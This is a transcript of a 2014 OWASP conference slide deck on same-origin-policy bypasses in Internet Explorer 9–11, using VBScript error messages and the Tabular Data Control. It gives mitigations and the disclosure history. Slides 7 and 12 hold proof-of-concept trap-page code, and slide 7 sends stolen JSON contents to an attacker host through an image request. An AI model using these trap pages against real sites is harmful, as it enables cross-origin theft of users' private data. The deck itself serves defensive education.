Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Bypass SOP, Theft your data #appsecapac2014

OWASP Japan
March 20, 2014
770

Bypass SOP, Theft your data #appsecapac2014

OWASP Japan

March 20, 2014
Tweet

Transcript

  1. View Slide

  2. !  Yosuke  HASEGAWA    @hasegawayosuke    
    !  Engineer  of  NetAgent  Co.,Ltd.  
    !  Secure  Sky  Technology  Inc.  technical  adviser  
    !  http://utf-‐‑‒8.jp/
    author  of  jjencode,  aaencode,  ...  
    !  OWASP  Kansai  Chapter  Leader  
    !  OWASP  Japan  Chapter  Advisory  Board  member  

    View Slide

  3. !  Cross-‐‑‒Origin  information  disclosure  
    !  Not  XSS,  but  bypass  SOP    
    !  Introduce  2  ways  for  modern  IE  
    !  VBScript  Error  msg    
    !  Tabular  Data  Control  

    View Slide

  4. View Slide

  5. !  VBScript  Error  Msg  
    !  Target:  IE9-‐‑‒10  (IE6-‐‑‒8  is  safe,  wow!)  
    !  Reading  JSON  Array  as  VBScript  on  
    trap  page  created  by  attacker  
    !  VBScript  raises  exception  with  error  
    message  including  JSON  content  
    !  JavaScript  can  access  to  JSON  content  
    via  error  message  

    View Slide

  6. !  Reading  JSON  as  VBScript  src  
    !  fail  →  raises  exception  
    //  Trap  page  by  attacker  
       src="http://example.jp/target.json"  
       language="vbscript">  
     
    HTTP/1.1  200  OK  
    Content-­‐Type:  application/json;  charset=utf-­‐8  
    [  "secret",  "data",  "is",  "here"  ]  

    View Slide

  7. !  catch  error  msg  with  error  handler  
    GET  http://attacker.utf-­‐8.jp/log?Type%20mismatch:%20'  
    %20"secret",%20"message",%20"is",%20"here"%20'  HTTP/1.1  
    Referer:  http://attacker.utf-­‐8.jp/  
    User-­‐Agent:  Mozilla/5.0  (compatible;  MSIE  10.0;  Windows  NT  
    6.1;  WOW64;  Trident/6.0)  
     <br/>window.onerror  =  function(  e  ){  <br/>        document.getElementById(  "img"  ).setAttribute(  <br/>                "src",  "http://attacker.utf-­‐8.jp/log?"  +  e  );  <br/>}  <br/>  
    language="vbscript">  

    View Slide

  8. !  Countermeasure  
    !  add  "X-‐‑‒Content-‐‑‒Type-‐‑‒Options:nosniff"  
    HTTP/1.1  200  OK  
    Content-­‐Type:  application/json;  charset=utf-­‐8  
    X-­‐Content-­‐Type-­‐Options:  nosniff  
    [  "secret",  "data",  "is",  "here"  ]  

    View Slide

  9. !  supplementary  
    !  Dec  2012:  reported  to  MS  by  me  and  
    @masa141421356  
    !  May  2013:  Fixed  with  MS13-‐‑‒037  only  
    for  IE6-‐‑‒8.  IE9-‐‑‒10  was  not.  
    !  "Add  X-‐‑‒C-‐‑‒T-‐‑‒O  header  for  IE9-‐‑‒11  to  
    prevent  from  this  attack,  this  is  
    BEHAVIOR  BY  DESIGIN"  they  said.  

    View Slide

  10. View Slide

  11. !  Tabular  Data  Control  -‐‑‒  TDC  
    !  ActiveX  Control  for  binding  text  file  into  
    HTML  as  data  table
    http://msdn.microsoft.com/en-­‐us/library/ms531356.aspx  
    !  Enabled  by  default  on  IE6-‐‑‒IE11,  with  
    older  doc-‐‑‒mode
     
    !  Spotlighted  by  Cure53  X-‐‑‒Mas  Challenge
    https://cure53.de/xmas2013/  
    https://cure53.de/xmas2013/writeup  
     The  winner  is  @kinugawamasato  

    View Slide

  12. //  Trap  page  by  attacker  on  attacker.utf-­‐8.jp  
    function  show(){  
           var  s  =  document.getElementById("tdc")  
                           .recordset.getString();  
           alert(  s  );  
    }  
    ...  
     
       classid="clsid:333C7BC4-­‐460F-­‐11D0-­‐BC04-­‐0080C7055A83">  
     
     
    //target  page  included  secret  data  on  example.jp/target.txt  
    Content-­‐Type:  application/octet-­‐stream  
    Content-­‐Disposition:  attachment;  filename=bindata  
    X-­‐Content-­‐Type-­‐Options:  nosniff  
    @!allow_domains=attacker.utf-­‐8.jp  
    secret,data,is,here  

    View Slide

  13. !  Attacker  has  to  insert  "@!
    allow_domains=..."  into  the  top  of  
    target  text  
    !  Once  inserted,  no  way  to  prevent  
    from  theft  
    !  Unhelpful:
    X-­‐Content-­‐Type-­‐Options:  nosniff    
    Content-­‐Disposition:  attachment  

    View Slide

  14. !  Countermeasure  
    !  Restrict  access  to  XHR  request  with  
    custom  X  header  
               and  /  or...  
    var  xhr  =  new  XMLHttpRequest();  
    xhr.open(  "GET",  "http://example.jp/target.txt",  true  );  
    xhr.setRequestHeader("X-­‐Requested-­‐With",  "XMLHttpRequest");  
    xhr.send(  null  );  
    GET  /target.json  HTTP/1.1  
    Host:  example.jp  
    User-­‐Agent:  Mozilla/5.0…  
    Accept:  */*  
    X-­‐Requested-­‐With:  XMLHttpRequest  

    View Slide

  15. !  Countermeasure  (cont.)  
    !  Don't  allow  to  place  text  by  attacker  
    into  top  of  the  content  
    //target  page  included  secret  data  on  example.jp/target.txt  
    Content-­‐Type:  application/octet-­‐stream  
    Content-­‐Disposition:  attachment;  filename=bindata  
    X-­‐Content-­‐Type-­‐Options:  nosniff  
    @!allow_domains=attacker.utf-­‐8.jp  
    secret,data,is,here  

    View Slide

  16. View Slide

  17. !  Conclusion  
    !  IE  has  funny  behavior  even  now  
    !  Add  X-‐‑‒Content-‐‑‒Type-‐‑‒Options  for  all  
    resources  
    !  Restrict  access  to  XHR  with  custom  
    X-‐‑‒  header  

    View Slide

  18. !  Question  ?  
     [email protected]‐‑‒8.jp  
     @hasegawayosuke  
     http://utf-‐‑‒8.jp/  

    View Slide